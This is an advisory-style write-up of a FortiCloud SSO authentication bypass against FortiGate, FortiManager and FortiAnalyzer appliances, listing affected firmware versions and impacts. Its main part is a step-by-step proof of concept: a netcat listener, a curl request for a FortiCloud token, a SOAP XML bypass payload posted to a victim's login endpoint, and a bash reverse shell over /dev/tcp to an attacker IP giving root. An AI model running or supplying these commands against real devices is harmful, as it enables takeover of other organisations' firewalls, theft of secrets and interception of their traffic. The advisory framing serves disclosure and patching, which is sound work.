# CVE-2026-24858 | FortiCloud SSO Authentication Bypass  

---

## Executive Summary

FortiCloud Single-Sign-On (SSO) a factory default enabled feature once you register any FortiGate/FortiManager/FortiAnalyzer  contains a critical authentication-bypass flaw.

An attacker who owns any FortiCloud account (free or paid) can reuse his SSO token to log into other customers’ appliances (≤ builds listed below) without knowing their passwords.

Post-exploitation grants full admin GUI and root shell access, allowing traffic interception, VPN tampering, or lateral movement into internal networks.

**Upgrade immediately or disable FortiCloud SSO until patched.**

---

### Affected Builds

| Product        | Vulnerable Firmware                                      | Patched                     |
|----------------|----------------------------------------------------------|-----------------------------|
| FortiOS        | 7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5    | ≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6 |
| FortiManager   | 7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9                   | same major.minor+1          |
| FortiAnalyzer  | same ranges                                              | same                        |


---

## PoC

1. **Attacker machine**  
   Listener for reverse shell:
   ```bash
   nc -lvnp 4444
   ```

2. **Obtain attacker token (15 min TTL)**  
   ```bash
   curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
     -H "Content-Type: application/json" \
     -d '{"username":"attacker@mail.com","password":"AttackerPass123"}'
   ```
   Response (snippet):
   ```json
   {"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
   ```
   Copy the `access_token` value.

3. **Build bypass payload**  
   Save as `bypass.xml`:
   ```xml
   <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Body>
       <authRequest>
         <serialNumber>FGT80ETK21000000</serialNumber>
         <token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
         <action>login</action>
       </authRequest>
     </soapenv:Body>
   </soapenv:Envelope>
   ```

4. **Send to victim (any firmware ≤ table above)**  
   ```bash
   curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
     -H "Content-Type: application/xml" \
     --data @bypass.xml \
     -c cookies.txt
   ```
   `HTTP 200 + Set-Cookie: APSCOOKIE=...` → success.

5. **Browse admin GUI**  
   Open browser or use curl with saved cookie:
   ```bash
   curl -k -b cookies.txt https://<VICTIM-IP>/ng/
   ```
   → Dashboard appears  no password asked.

6. **Root shell (CLI widget)**  
   Inside GUI: **Dashboard → CLI Console**
   ```bash
   execute bash
   bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
   ```
   Listener receives:
   ```
   root@FGT80ETK21000000:/#
   ```

---

## Impact

| Scenario           | Result                                                                 |
|--------------------|------------------------------------------------------------------------|
| Read-only admin    | Export full configuration (VPN secrets, local-in policies, user hashes). |
| Write admin        | Alter firewall rules, create local users, disable logging, implant persistent scripts. |
| Root shell         | Dump `config.dat`, extract HA keys, pivot to internal subnets, implant backdoor service. |
| Lateral movement   | Device becomes foothold; VLANs & SSL-VPN tunnels trusted → deeper network breach. |
| Data exfiltration  | All traffic passes through FortiGate → transparent proxy + certificate injection. |

